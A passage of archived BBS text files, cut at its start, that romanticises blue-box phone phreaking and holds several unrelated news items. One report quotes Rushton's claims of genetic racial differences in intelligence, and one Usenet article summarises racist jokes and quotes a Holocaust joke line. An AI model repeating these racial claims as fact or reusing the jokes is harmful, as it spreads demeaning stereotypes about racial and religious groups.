Crunch breakfast cereal when he'd discovered that their free bos'n whistle
produced a fundamental tone for long-distance calls.  He also found out other
phone intelligence information he needed from Bell System publications and by
making himself obnoxious at the Bell switching offices.  Cap'n Crunch was
charting the unkown seas of the phone system with the true "Star Trek" spirit
of seeing what there was, going where no man has gone before, and having fun
doing it.

   Woz had imagined Crunch to be a superengineer, a consultant to the computer
industry, an ultragenius driving a van equipped to do everything but fly -- a
hybrid version of James Bond, the Man from U.N.C.L.E., and the professor on
"Gilligan's Island."  but at this first meeting in the Berkeley dorms ol' Woz
did a double take.  Standing before him was, well, a madman.  With long frizzy
hair, the Crunch was wild-eyed and almost toothless, to boot, like a pirate
from the seven seas.

   Cap'n Crunch launched immediately into his discoveries.  After many hours
had passed, Wozniak and Jobs knew how to access different countries, overseas
information operators, satellites, and transoceanic cables.

   Woz and Jobs were handed an opportunity to test out their newfound knowledge
late that night.  On their way to Jobs' house in Silicon Valley, the car died
out near a phone booth in the town of Hayward.	They tried to beep their way
back to Berkeley with their trusty blue box, but Woz had trouble making the
connection.  He was getting very nervous trying to "explain" to the operator
what he was doing, when a police car pulled up and slammed on the brakes,
lights flashing.  The office sauntered over to the phone booth, and the two
Steves knew they had been tricked by the operator.  The officer, trained in the
ways of criminals caught in the act, shifted his attention to some nearby
bushes -- thinking the boys had thrown something in them.  In this instant,
Jobs passed the blue box to Woz, who quickly shoved it in his coat pocket.

   Brave move. But to no avail:  The officer routinely searched both and
liberated them of their new tool.  The officer randomly pushed buttons, and the
blue box responded:  bleep, bleep, blup, bloop!

   "What's this?" he demanded.

   Woz took a chance:  "I-it's a m-m-music synthesizer, officer."

   Another police officer arrived and started trying to figure the thing out.
He grilled them:  "What's the orange button?"

   "That's for calibration,"  Jobs said.  "It's designed to interface with a
computer."

   The two boys were escorted into the back of the patrol cruiser.  Feeling
doomed, they were beginning to realize that being a pioneer and a prankster had
its risks.  Then the cop with the box turned around from the front seat and
handed them the blue box, saying, "A good idea, but a guy named Moog beat you
to it...."

   There is probably no one in the computer industry who has not heard of Steve
Wozniak and Steve Jobs.  A lot of people in the industry have heard of John
Draper, alias Cap'n Crunch, and a lot of people haven't.  But probably everyone
in the industry -- probably everyone in Western society -- knows someone like
them:  The guy with the ham radio next door.  The kid down the street who
crashed his school's computer from home.  The hacker in the office across the
hall who's always tampering with everyone else's files.  They all seem to be
propelled by some inborn drive to do what few -- if any -- can do or have done.

   These are the brethren of the high-tech frontier, the would-be merry
pranksters of computerdom.  The brethren break new ground, thinking the
unthinkable, charting the unknown.  Wherever their minds go, we will all go --
eventually.  No one holds the future so much in their hands as the pioneers of
today's supertechnology.  Thank God, they've got a sense of humor.

   In the formative years of the brethren, before they'd settled on a field of
specialization, when they were young and unconsciously adventurous, they were
unaware of the strength of the cultural rules.	for some of them, a
prankstering spirit could mean disaster, but Woz and Jobs seemed to live an
almost magical existence beyond the law and trouble.  After mastering the blue
box, they organized blue-box parties at the Berkeley dorms.  Once a week, with
an audience of 20 or 30 people, they held demonstrations.  They'd call
operators in other countries and go around the world by switching from an
operator in one country to an operator in another.  Finally a phone would ring
in the dorm room next door.  Someone would pick up and hear Woz's voice coming
from around the world.

   They'd call Dial-A-Joke in New York (Woz subsequently started his own
dial-a-joke service), weather numbers in Australia, phone booths in Cape Town,
bars in Ireland, all amplified so the entire audience could hear.  Before the
night was through, everyone in the room would talk to some friend or relative
in another country -- all for free, all for fun.  Woz was always thinking
up fantastic feats for the Berkeley Blue Box Show.  Everyone loved him, and he
loved being the star.  Before long he was calling himself Berkeley Blue and had
an almost professional routine.  When whe was finished blowing away the
audience, Blue's partner Jobs, code-named "Oct Tobor," would step in and offer
shiny new blue boxes for sale -- guaranteed at a low, low price of $80.  Shades
of things to come....

   Woz and Jobs didn't just hand-wire their boxes.  Woz created them with
state-of-the-art technology and laid them out on personally designed printed
circuit boards.  This was a professional operation, a miniature high-technology
company, complete with product, sales, service, and support.  Woz immersed
himself in the tech, Jobs collected the money.	Those boys sold more than two
hundred boxes and lived off the revenues for an entire school year.

   A charmed life, some might say.  But then the blue-box luck ran out.  One
night Woz and Jobs stopped at a pizza parlor practically next door to Woz'a
elementary school in the Silicon Valley town of Sunnyvale.  They were on their
way to Berkeley to sell a blue box, but they need some money right away and
thoght they might save themselves the trip by selling it in Sunnyvale.	Almost
eeryone feels safe in a familiar haunt in his hometown, and Jobs and Woz were
no exception.  Chewing their pizza, they surveyed the customers at the other
tables.  The families were out of the question.  So were the tables full of
teenagers.

   But there were some really disreputable-looking characters at another table
who looked as if they might be able to put the blue box to good use.  Feeling
confident, Wozniak and Jobs approached the table and had a low conversation
about the merits of the box.  Were they interested?  They were interested all
right.	And they were hooked after they watched the demonstration.  They didn't
have the money right then, so they took Woz and Jobs out to their car under the
pretext of giving them their business card.

   The only problem was that the business card was a gun.  That blue box
changed ownership pretty fast, and the shady characters drove off.  They had
the box -- but they didn't know how to use it, and Woz and Jobs never told
them.  The secrets of Cap'n Crunch were safe.

   In 1974, Cap'n Crunch, aka John Draper, was busted for blue-boxing.  For the
second time.  By federal, state, and local authorities.  Fraud by wire was the
charge.  He had already spent six months in a federal penitentiary in
Pennsylvania.  The second time, he was sent to Lompoc -- a federal pen in
California.

   The likable yet unfortunate Cap'n.  How could he have know when he learned
how to make free long-distance calls from blind kids who whistled their
frequencies into the phone, that he'd do time?  How could he have know that the
Cap'n Crunch cereal that inspired the blue box would lead to this?  How could
he have know when he blue-boxed his way to Nixon's bedside to inform the
president of the nation's toilet paper crisis that he might end up in the
slammer?

   In Lompoc an inside informer for the Mafia broke [the Cap'n's] back when he
refused to impart the secrets of the blue box.	That was the end of Cap'n
Crunch but not of John Draper -- a man described by Wozniak as being wanted by
the FBI because he was "too intelligent."  If Draper hadn't been made such a
folk hero by the press, it might not have gone badly for him.  Then again, his
final stay in jail led him to computer fame and fortune.  It was while he was
in a work program that he wrote Easy Writer, the first professional-style word
processing program for the Apple.

   A couple of years later, IBM was looking around for software to bundle with
its PC.  By that time, there were better packages than Easy Writer, but someone
at IBM had a sense of humor.  IBM asked Draper and his new software company,
Cap'n Software, to design and program this now classic word processing package
for its first entry into the personal computer market -- an irony not lost on
those familiar with his bouts with AT&T.

   After their brushes with the dark side of the force, John Draper, Stephen
Wozniak, and Steve Jobs got a whole lot smarter.  They wised up to some of the
mysterious workings of the power structures.  They lost their innocence, but
they gained something else.

   Wozniak and Jobs struck it rich early in the Silicon Rush.  They made
history with their Volkswagen-like Apple II.  John Draper became wealthy enough
to drive a Mercedes-Benz through the streets of Berkeley with his first release
of Easy Writer for the Apple II.

   New fortunes are still being made regularly in Silicon Valley, if not as
often as they once were.  And empires that once were, already are no longer.
A new crop of microcomputer genius-pranksters is making headlines.  Their
exploits have inspired movies and a television show.  As technology's first
wave of pranksters comes of age, they are shifting their curiosity to things
that are, as Wozniak explains, "creative and useful."  But they're still doing
things that few -- if any -- have done.  Wozniak sponsored live satellite
linkups with the Soviet Union at his outdoor musical US Festivals.  Draper is
masterminding a vast artificial intelligence network.  Some of the others early
pioneers are funding private space programs.  Some are pursuing medical
applications such as life extension.  Others are entering the arena of
politics.

   In the realm of genius-pranksters and supertechnology, just about anything
is still possible.

   Putting the most powerful tools into the hands of individuals with
creativity, integrity, and courage is bound to have awesome consequences.  When
the real whiz kids get together to conspire, they create not simply pranks, but
miracles... <>

[Courtesy of Sherwood Forest ][ -- (914) 359-1517]

-----End of File

	       How To Talk To The Press by Johnny Mnemonic
       Excerpt from Computer underground Digest 4.45 (23-Sep-92)

((It was rumored that, immediately after his appearance on
an NBC news show, that John (Cap'n Crunch) Draper was
released from his job for reasons of fiscal expediency.
Whether true or not, this seems like a good time to reprint
Mike Godwin's advice on "How to Talk to the Press" for those
who are in the rolodexes of media folk)).

This is a file I posted to an Austin BBS back when I gave the SJG
story to the local papers.

 104: Talking to Media, part 1
  By: Johnny Mnemonic  [54]
Date: 11:07  3/18/90

As I've promised on another message base, here's the beginning of
discussion of how to bring stories to the media.

Since I keep thinking of different things people ought to know about
how to take a story to the media, I'm going to make this a multi-post
discussion.

1) TRY TO THINK LIKE THE REPORTER YOU'RE TALKING TO.

One of the things that happens when people know about an event or
series of events that may make a good news story is that they assume
the importance of the story will be obvious to anyone.

Sometimes this is true (when the tipster knows about a murder, for
example). Often it's not.

So, when I tell a reporter about a story I think she should want to
cover, I make sure to stress the aspects of the story that are likely
to interest that reporter and/or the readers of her publication. For
example, when I spoke to Kyle Pope about the Illuminati seizure, I
stressed the following:

a) Steve Jackson Games is an Austin business that may end up being
damaged by the seizure.

b) Nobody has given this story anything like major coverage in the
national media, or (so far as I knew) in other geographic areas. (I
was telling him he had a major "scoop" opportunity.)

c) There are some very dramatic aspects to this story. (I told him
about the 20-year-old LoD member who woke up on the morning of March 1
with a gun pointed at him by a Secret Service agent.)

2) IF YOU'RE GOING TO MEET THE REPORTER IN PERSON, TRY TO BRING
SOMETHING ON PAPER.

There are lots of good reasons to follow this rule:

a) Believe it or not, but people take stuff on paper a little more
seriously than the spoken word. It's nice to give the reporter
something that lends substance to what you're saying, even if the
substance is printouts from your own computer.

b) It makes life easier for the reporter, who doesn't have to write
down every single thing you tell her. Reporters like to have materials
they can use for reference as they research and write their stories.

c) It helps you remember to say everything you want to say. Nothing is
more frustrating than trying to get a reporter interested in your
story, getting inconclusive results, and then realizing later that you
should have told the reporter about something. (E.g., "Damn! I forgot
to tell him what 'cyberpunk' means, so he won't know how the federal
agents misinterpreted the manual.")

When I went to the Statesman, I took edited printouts of discussions
from Flight, from SMOF, and from comp.dcom.telecom on Usenet. I also
took some private Email I had received, with the names of the senders
deleted. And I took my copy of the WHOLE EARTH REVIEW with the article
on Usenet. My object was to convey to him the scale of concern about
the seizures, plus give him enough background to be able to ask
reasonably informed questions of the people he talked to.

3) GIVE THE REPORTER OTHER PEOPLE TO TALK TO, IF POSSIBLE.

Two basic justifications for this rule: First, it'll help your
credibility (especially if you don't already know the reporter
personally). Second, multiple sources or witnesses usually enable the
reporter to filter out what is mere opinion or speculation from what
everybody actually knows for a fact.

4) DON'T ASSUME THAT THE REPORTER WILL COVER THE STORY THE WAY YOU'D
LIKE HER TO.

Reporters' accuracy and focus in a story are constrained by several
factors:

a) The amount of available time. Reporters have to be quick studies,
and often have to assimilate a complex story in a hurry. This
necessarily increases the risk of inaccuracy in a story, and gives you
an even greater reason to follow Rules 1 through 3.

2) The reporters' obligation to be fair. This means they have to talk
to people on the other side of the issues from you. This in turn means
that you're unlikely to get a story that represents or promotes your
point of view at the expense of those who oppose you.

<More on this topic as I think of things. Please feel free to comment.>

------------------------------
-/Vuarnet International/-
      617/527.oo91
  24oo-16.8k HST/V32bis
(NEWS)(GOVERNMENT)(NYC)(00001)

Computer Access Arrests In NY 11/03/92
GREENBURGH, NEW YORK, U.S.A., 1992 NOV 3 (NB) -- The
Greenburgh, New York Police Department has announced the arrest of
three individuals, Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron
J. Woodard, 18 for the alleged crimes of Unauthorized Use Of A computer
and Attempted Computer Trespass, both misdemeanors. Also arrested was
Jason A. Brittain, 22  in satisfaction of a State of Arizona Fugitive From
Justice warrant.

The arrests took place in the midst of an "OctoberCon" or "PumpCon"
party billed as a "hacker get-together" at the Marriott Courtyard Hotel in
Greenburgh. . The arrests were made at approximately 4:00 AM on
Sunday morning, November 1st. The three defendants arrested for
computer crimes were granted $1,000 bail and will be arraigned on
Friday, November 6th.

Newsbytes sources said that the get together, which had attracted up to
sixty people, had dwindled to approximately twenty-five when, at 10:00
Saturday night, the police, in response to noise complaints arrived and
allegedly found computers in use accessing systems over telephone lines.
The police held the twenty-five for questioning and called in Westchester
County Assistant District Attorney Kenneth Citarella, a prosecutor versed
in computer crime, for assistance. During the questioning period, the
information on Brittain as a fugitive from Arizona was obtained and at
4:00 the three alleged criminal trespassers and Brittain were charged.

Both Lt. DeCarlo of the Greenburgh police and Citarella told Newsbytes
that the investigation is continuing and that no further information is
available at this time.

(Barbara E. McMullen & John F. McMullen/19921103)
.FBI raids major Ohio computer bulletin board; action follows joint
investigation with SPA

The Federation Bureau of Investigation on Saturday, Jan. 30, 1993, raided
"Rusty & Edie's," a computer bulletin board located in Boardman, Ohio,
which has allegedly been illegally distributing copyrighted software
programs. Seized in the raid on the Rusty & Edie's bulletin board were
computers, hard disk drives and telecommunications equipment, as well as
financial and subscriber records. For the past several months, the Software
Publishers Association ("SPA") has been working with the FBI in
investigating the Rusty & Edie's bulletin board, and as part of that
investigation has downloaded numerous copyrighted business and
entertainment programs from the board.

The SPA investigation was initiated following the receipt of complaints
from a number of SPA members that their software was being illegally
distributed on the Rusty & Edie's BBS. The Rusty & Edie's bulletin board
was one of the largest private bulletin boards in the country.  It had 124
nodes available to callers and over 14,000 subscribers throughout the
United States and several foreign countries.  To date, the board has logged
in excess of 3.4 million phone calls, with new calls coming in at the rate
of over 4,000 per day.  It was established in 1987 and had expanded to
include over 19 gigabytes of storage housing over 100,000 files available
to subscribers for downloading. It had paid subscribers throughout the
United States and several foreign countries, including Canada, Luxembourg,
France, Germany, Finland, the Netherlands, Spain, Sweden and the United
Kingdom.

A computer bulletin board allows personal computer users to access a host
computer by a modem-equipped telephone to exchange information, including
messages, files, and computer programs.  The systems operator (Sysop) is
generally responsible for the operation of the bulletin board and
determines who is allowed to access the bulletin board and under what
conditions. For a fee of $89.00 per year, subscribers to the Rusty & Edie's
bulletin board were given access to the board's contents including many
popular copyrighted business and entertainment packages. Subscribers could
"download" or receive these files for use on their own computers without
having to pay the copyrighted owner anything for them.

"The SPA applauds the FBI's action today," said Ilene Rosenthal, general
counsel for the SPA.  "This shows that the FBI recognizes the harm that
theft of intellectual property causes to one of the U.S.'s most vibrant
industries. It clearly demonstrates a trend that the government understands
the seriousness of software piracy." The SPA is actively working with the
FBI in the investigation of computer bulletin boards, and similar raids on
other boards are expected shortly. Whether it's copied from a program
purchased at a neighborhood computer store or downloaded from a bulletin
board thousands of miles away, pirated software adds to the cost of
computing.  According to the SPA, in 1991, the software industry lost $1.2
billion in the U.S. alone. Losses internationally are several billion
dollars more.

"Many people may not realize that software pirates cause prices to be
higher, in part, to make up for publisher losses from piracy," says Ken
Wasch, executive director of the SPA.  In addition, they ruin the
reputation of the hundreds of legitimate bulletin boards that serve an
important function for computer users." The Software Publishers Association
is the principal trade association of the personal computer software
industry.  It's over 1,000 members represent the leading publishers in the
business, consumer and education software markets. The SPA has offices in
Washington DC, and Paris, France.


       CONTACT: Software Publishers Association, Washington
             Ilene Rosenthal, 202/452-1600 Ext. 318
              Terri Childs, 202/452-1600 Ext. 320

Prof Pilloried for race theory

By Jeffrey Ulbright in Toronto

   Professor Philippe Rushton has been confined to lecturing into a video
camera at Western Ontario University, where his theories on race and
intelligence have made him a discomforting presence.  Since the academic year
began, students taking Dr Rushton's undergraduate course - Theories of
Personality - have been obliged to pick up his 90-minute taped lectures, view
each one alone and in seclusion, and telephone the psychology professor with
any questions.  Dr Rushton gained notoriety throughout North America by
announcing that his research showed whites were more intelligent than blacks,
Orientals were more intelligent than whites and the reasons were genetic and
evolutionary.  University officials say the special treatment of Dr Rushton's
lectures is necessary to avoid disturbances, even violence, by some elements
on the campus at London, Ontario.  Dr Rushton responded in an interview: "In
my view, it's an infringement of my academic freedom because I cannot discuss
my views with the students and the students are not allowed to challenge me.
The whole normal student-teacher relationship is gone." His performance
evaluation also has been dropped from a consistent "very good" or "excellent"
to "unsatisfactory." That could have been the first step in an administration
attempt to sack him, but the university senate grievance committee has
overturned the psychology department evaluation.  "That means I get a pay
increase," Dr Rushton said, "and most importantly, it removes any possibility
of the university initiating dismissal proceedings against me on those
grounds." Administration officials deny the university is trying to muzzle or
harass Dr Rushton or interfere with his academic freedom.  "No one involved
thinks videotaping lectures is the best solution to the problem, but it's the
only one we could come up with that we think is viable," said Dr Tom Collins,
vice-president for academics. "A lot of people are critical of that
situation." Dr Rushton, aged 46, has been at Western Ontario for 13 years
and, until January 1989, laboured in relative obscurity.  He was known in
academia as co-author of the best-selling textbook Introduction to Psychology
and won a Guggenheim research fellowship in 1988, but burst into public view
only with a 20-minute speech to the American Association for the Advancement
of Science.  Many scientists stormed out of the hall in San Fransisco when Dr
Rushton set out his thoughts on genetic and evolutionary differences between
the races.  "My conclusions are totally unpopular," he admitted. "I conclude
that, on 50 or 60 different measures, Orientals and blacks are at opposite
ends of a continuum with whites, or caucasoids, falling consistently
somewhere in the middle. These measures include intelligence, sexual
behaviour, brain size, law abidingness, social organization skills,
personality and speed of physical maturation." Dr Rushton also teaches a
graduate course called Human Life History, covering the evolutionary basis of
personality. Only two students are enrolled and he teaches it "more or less
normally", he said. "We meet once a week in a location that is kept secret
from everybody but me and the two students." For the twelve undergraduates in
his theories of Personality course, he goes to a different classroom each
week to tape a lecture. "Normally there would be up to 60 students in this
class," he said.  The students are allowed to telephone him during one hour a
week to ask him questions or make appointments. An appeal of the ruling that
he must teach by videotape is still before the university senate.  "This is
consuming an enormous amount of my time," Dr Rushton complained.  Dr Collins,
the university vice-president, said when asked whether the university was
embarrassed by the professor: "In the university in general, some people are
embarrassed by his work. The official stance is he has academic freedom and
will be judged by his peers." Dr Rushton says racial difference is a
fascinating question on which he has worked since 1981 and published since
1984, "even getting ratings of excellent from the university for my race
work. It was when it began to be public that the axe began to come down on my
head." Race was a taboo, he said, but that "only goes back to the Second
World War as a result of Hitler's so-called racial policy." In the aftermath
of the war, there had been a virtual self-imposed taboo on the scientific
study of race differences from a genetic perspective.  No known environmental
cause explained the differences between races, said Dr Rushton. "Things like
white racism and poverty just don't do it." "If I had said either that the
differences do not exist and it's all due to white racism, then I would not
have run into trouble. But once you suggest genetics or evolution in the
context of race, you're in for trouble, and I knew I would be." Dr Rushton
says he does not like being unpopular and that he wants to make a
contribution to science and be rewarded with approval for doing so.  "I do
not like to have my views totally unpopular as they are," he said, "but I do
believe I'm right. I feel that this is something that is going to be
recognized."

Typed in by Mark Norman, for The Pinnacle Club BBS Library. From werner Thu Oct 27 14:06:34 1988
Flags: 000000000001
From: funny@looking.UUCP (Funny Guy)
Subject: KW Record Article on Joke Debate
Keywords: administrivia
Date: 30 Nov 88 20:20:15 GMT
Organization: Looking Glass Software, Waterloo Ont.

The following article appears today on the *Front Page* of the Kitchener-
Waterloo Record, the major daily in the town in which I live.

It is reproduced *with* permission. (How often do you see that?)
It may not be reproduced for commercial purposes.

[ In my opinion this is a gross misrepresentation which will possibly
result in not just the downfall of rec.humor.funny, but many other
groups as well.  Further comment follows.  Don't reply to me, yet.]

The Kitchener-Waterloo Record
225 Fairway Rd.
Kitchener, Ont.
N2G 4E5

1-519-894-2231

Wayne MacDonald, Managing Editor
Story Byline: Luisa D'Amato



===========

Editor's note:  As a matter of general policy, the Record does not
publish material judged to be racially offensive.  We have made an
exception in this article because the actual jokes and comments
contained within represent the central issue and are the key
elements in aid of full reader understanding and appreciation.

By Luisa D'Amato
Record Staff

Controversial racial jokes are being sent by computer from Waterloo to
about 20,000 people world-wide, using the University of Waterloo
mathematics computer systems as part of the chain of communication.

>From California to Massachusetts to Isreal, computer users are bitterly
arguing about Brad Templeton of Waterloo adn whether he ought to be
transmitting jokes that some see as offensive and racist.

Templeton, who owns Looking Glass Software in Waterloo, is the editor
of a computer joke exchange that is part of the USENET computer network.

One recent joke depicts a black man, who is dating a gorilla and isn't
allowed to buy it a drink in a bar.  He dresses, shaves and puts
makeup on the animal, which is then let into the bar and
is mistaken for an Italian woman.

Another joke describes a Jew who is murdered after he tricks a Scotsman
into buying him dinner.

Officials at UW say they are discussing what to do about the fact the
institution carries Usenet -- including the joke exchange.

Templeton said in an interview that he's edited the joke exchange without
pay, as a hobby, since August of 1987.  He said only about 10 per cent
[No, I said 5%] of the jokes he sends out are racially, sexually or
otherwise offensive.

His usual practice with offensive jokes is to put them in code.  Then,
the people who want to read it press a couple of keys to decode it.

He receives dozens of jokes each day from readers and sends out about
two a day.  He said he doesn't judge the jokes based on their content,
but only their comic value.

"Jokes which offend some people do come through," Templeton said.
"It's my belief that it is better to have a world in which we can
laugh at the evil things that are in the world, than a world where we
must carefully consider whether or not anything can offend someone."
[I doubt my grammar was that bad.]

But others don't agree.

"This sort of thing just enhances stereotypes," said Abyd Karmali, who
graduated this year from UW with a chemical engineering degree.  "It
legitimizes having these feelings and sharing them with people.  That
can only be damaging."

Karmali now studies at the Massachusetts Institute of Technology.  He
shares an appartment there with another student, Jonathan Richmond, one
of several people who sent messages objecting to Templeton's judgement.

After lengthy debate on this, Templeton sent a joke, in code, entitled,
"Top 10 reasons not to replace Brad as moderator."

Among the 10 reasons: "Kill six million of 'em, and the rest lose their
sense of humor.  Jeez."

Asked about that line, Templeton said, "Mostly I was just making fun there.
That line was sarcasm...  A lot of people wrote back to say that line was
tremendously funny.

"The idea is what you're laughing at is the absurdity of the line; the
absurdity of suggesting that killing six million Jews was something to be
taken lightly.  That's why the 'Jeez' is there.  And so I feel that's
definitely an example of a line where you're laughing at the racist
attitude rather than the race.

Richmond said he sees the joke as an "act of violence" which "defames
the memory" of the Holocaust victims.

"One racist joke disseminates over a network of thousands of people.
It's the promotion of an underground network of bigots," he said.

"People feel that have a different relationship with computers than with
other people," he said.  "They feel that can type on to a keyboard what
they might not say to someone's face."

Meanwhile, Karmali, who was a student residence don and president of the
chemical engineering society while at UW, says his alma mater is
"acting as an accessory" in the matter.

UW gets USENET because many of the network's hundreds of different groups
offer "valuable information" on computer software, said Lyn Williams,
executive assistant to the dean of mathematics.

The university sees itself as a "common carrier" of information, with
no mandate to review information passing through its computer system,
she said.

But she said it would be possible for UW to discard the so-called
recreational services in USENET, such as the joke exchange and tips
on sports and leisure activities.

Alan George, UW vice-president academic and provost, said Tuesday that
he hasn't heard about the controversy, but "I'm certainly going to
ask a lot of questions."

"In some way, the university is facilitating this... and I think, as
such, we'll certainly look into it," he said.

"The university generally would be opposed to any ethnic or racially
offensive jokes."

About 180 people at UW regularly read the joke exchange, Templeton said.
And "no one from Waterloo that has contacted me has expressed anything
but support," said Templeton, who was a UW student in the late 1970s and
early 1980s.

Templeton said he believes the controversy arose because the joke about
the Jew and the Scotsman was transmitted close to the 50th anniversary of
Kristallnacht, Nov 9-10, 1938, when Jewish businesses were gutted and
synagogues burned in Germany.

After richmond complained, Templeton apologized for having neglected to
put the joke in code.

However, Richmond said that doesn't answer his concerns.  "It's still
there... He ahs sent it out with the (descriptive) keyword, 'racist'...
He is an editor.  He should not include jokes which are racially offensive.

Richmond, who is Jewish, sent a message to other computer users.  He said
he worked in Watts, the black ghetto of Los Angeles, and "I have
many eyewitness accounts of the hurt caused by racial stereotyping and
by the jokes which promote it."

But many users disagreed with him.  One message from Tel Aviv University
in Israel asked Richmond: "Maybe you should ask yourself why do you
take it so badly; maybe there is something wrong with your sense of
self-identity?"

Another wrote: "My ultimate goal -- to reply to Jonathan Richmond -- is
the elimination of Jonathan Richmond."

--30--

-- 
The rec.humor.funny fascist.  (Thanks to whoever gave me that title!)

From werner Thu Oct 27 14:06:34 1988
Flags: 000000000001
From: funny@looking.UUCP (Funny Guy)
Subject: You can Reply to the K-W Record Article by electronic mail
Summary: Information on how to reply to the record article
Keywords: administrivia
Date: 30 Nov 88 22:40:44 GMT
Followup-To: news.misc
Organization: Looking Glass Software Ltd.

As you can see, Johnathan Richmond took the RHF debate to the press.
His attempt to do so caused the article you just saw, which among other
things, will put pressure on the University of Waterloo administration
to cut not just rec.humor.funny but all the non-technical groups from
this region of the net.  This would include many groups Mr. Richmond
did not intend, such as soc.culture.jewish!

What the University does is of course, up to them.

If you wish to express an opinion, you can mail one, phone one, fax
one or, though a mailbox I have set up, EMAIL one.  Email will of course
be easiest for you, but I suspect that the other media might be more
impressive.  It's up to you.  I will forward the contents of the
mailbox record@looking.UUCP to their editors.  You MUST follow certain
rules if you wish your letter to be considered an official letter to the
editor, as it will not be signed.

I would ask people in K-W to use regular postal mail if they can.


PLEASE BE MODERATE IN YOUR OPINIONS, AND DO WHATEVER YOU CAN TO ENSURE
THAT THE FLAMES ARE NOT FANNED FURTHER THAN THEY HAVE TO BE ON THIS MATTER,
PARTICULARLY IN THE GENERAL PRESS.  We can solve these problems by ourselves.

===================================
Title the letter "LETTER TO THE EDITOR"
Mark the letter "c/o Ross Weichel"

Make the salutation:  "To the Editor:"

Keep the letter short, and to the point.  And, to be honest, don't write
like most people do to the net. :-)

Sign your letter with your full name, and give your address and some
phone numbers where you can be reached.  They will want to verify what
they print as authentic.

You can reply to this message, and it will go to record@looking.UUCP, not
to me.   Be warned, however, that the mail you send will not be private.
(As a letter to the editor, that's not surprising.)

While I'm an honest man, I can understand if you don't wish to use this
method of mail considering my bias on the issue.   I vow to retransmit
as is.
=====================================

If you wish to FAX a letter, the FAX number is: 1-519-894-3912

If you wish to telephone, the number is 1-519-894-2231.  I am not sure
how phone calls are counted.

If you wish to write with regular mail, use:

The Editor
c/o Ross Weichel
Kitchener-Waterloo Record
255 Fairway Rd.
Kitchener, ON
N2G 4E5

Canada
======================================

I can't tell you what to say, or whether to support me or not.
What I want is to show them that they have seriously misrepresented
the nature of the affair, and the level of public opinion amongst those
who have seen the full context of the matter.

Don't be abusive -- be reasoned, whether for or against me.
They are a medium sized large paper, with circulation of about 90,000.
(That's actually fairly big for a daily.)

My own detailed comments will follow when I'm a tad calmer.
Don't reply to me right away, or rush to offer me a feed.  I am sure
that these sort of things can be dealt with if they arise.  I still
believe they will not.

***Remember, replies to this message go to record@looking.UUCP.***

PLEASE, TRY TO KEEP THINGS CALM, he shouted.

Looking talks to math.waterloo.edu (watmath) and "att", but they will
only forward from within AT&T.
-- 
The rec.humor.funny fascist.  (Thanks to whoever gave me that title!)

 Disc jockeys who were suspended by a radio station
for concocting an elaborate on-air murder confession apologized to listeners
Friday. 

   Morning radio personalities Kevin Ryder, Gene ``Bean'' Baxter and former
Arizona radio personality Doug Robert - who now works at the Southern
California station - were suspended for the incident at KROQ-FM. The duration
of the suspension wasn't disclosed. 

   Ryder and Baxter were heard on a pre-recorded apology aired Friday. 

   The disc jockeys were in a meeting with KROQ executives Friday afternoon and
couldn't be reached. A receptionist who refused to give her name said none of
the executives was available. 

   Officials at the parent company, New York City-based Infinity Broadcasting
likewise were unavailable, said a secretary for Mel Karmazian, Infinity
president and chief executive officer. 

   The trio was suspended a week after KROQ acknowledged the stunt to the Los
Angeles County Sheriff's Department, which spent 10 months investigating
hundreds of called-in leads. 

   In Washington, the head of the Federal Communications Commission's
enforcement division said Friday that similar hoaxes have led to FCC license
revocations. The KROQ incident was being investigated by the FCC. 

   ``We are evaluating what action, if any, we should take,'' said Charles E.
Kelley, adding the station ``could lose its license for this type of incident
if it was judged by the commission that the incident showed an abdication or a
loss of control by the station.'' 

   The Sheriff's Department plans to bill the Burbank station for time spent
investigating last June's hoax, said sheriff's spokesman Bob Stoneman. 

   ``I don't even want to guess'' the amount of the bill, Stoneman said. 

   KROQ officials were considering further disciplinary action against the disc
jockeys based upon listeners' responses, the Los Angeles Times reported. 

   On Thursday, the station was deluged with hundreds of calls from angry
listeners and at least one advertiser was threatening to pull its ads. 

   The bogus confession was made June 13 during a ``Confess Your Crime'' skit 

   in which Ryder and Baxter encouraged listeners to call in and reveal their
transgressions on the air. 

   The caller, who refused to give his name, said: 

   ``I heard you guys talking. I really need to tell somebody about this. 

   ``I had this girlfriend for like about six years and we were right on the
verge of getting married and all of this stuff. And I came home and caught her
with somebody ... a good friend of mine, as a matter of fact.'' 

   After some prodding by the disc jockeys, the caller admitted that be had
badly beaten his girlfriend: 

   One disc jockey asked: ``Is there a chance, seriously, that you killed
her?'' 

   The caller responded: ``Yeah, I know I did.'' 

   More than 60 calls and faxes flooded the station shortly after the
confession aired. Hundreds more phoned authorities after the local news
agencies and the TV series, ``Unsolved Mysteries'' reported the confession. 

   Among the most persistent callers were a mother and father in Northern
California who are trying to solve the mystery of their daughter's death. 





X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
 Another file downloaded from:                     The NIRVANAnet(tm) Seven

 & the Temple of the Screaming Electron   Taipan Enigma        510/935-5845
 Burn This Flag                           Zardoz               408/363-9766
 realitycheck                             Poindexter Fortran   510/527-1662
 Lies Unlimited                           Mick Freen           801/278-2699
 The New Dork Sublime                     Biffnix              415/864-DORK
 The Shrine                               Rif Raf              206/794-6674
 Planet Mirth                             Simon Jester         510/786-6560

                          "Raw Data for Raw Nerves"
X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
Date: 06-25-91  00:37
From: James Hartman

The following is in the original text as it printed in Roswell
-------------------------------------------------------------------------
Roswell Daily Record  for Tuesday, July 8, 1947.
RAAF Captures Flying Saucer On Ranch in Roswell Region
No Details of Flying Disk Are Revealed
 Roswell Hardware
 Man and Wife
 Report Disk Seen
 The intelligence office of the 509th Bombardment group at Ros- well Army
Field announced at noon today, that the field has come into possession of a
flying saucer.
 According to information released by the department, over authority of Maj.
J. A. Marcel, intelligence officer, the disk was recovered on a ranch in the
Roswell vicinity, after an unidentified rancher had notified Sheriff Geo.
Wilcox, here, that he had found the instrument on his premises.
 Major Marcel and a detail from his department went to the ranch and
recovered the disk, it was stated.
 After the intelligence officer here had inspected the instrument it was
flown to "higher headquarters.
 The intelligence office stated that no details of the saucer's construction
or its appearance had been revealed.
 Mr. and Mrs. Dan Wilmot apparently were the only persons in Roswell who seen
what they thought was a flying disk.
 They were sitting on their porch at 105 South Penn. last Wednesday night at
about ten o'clock when a large glowing object zoomed out of the sky from the
southeast, going in a northwesterly direction at a high rate of speed.
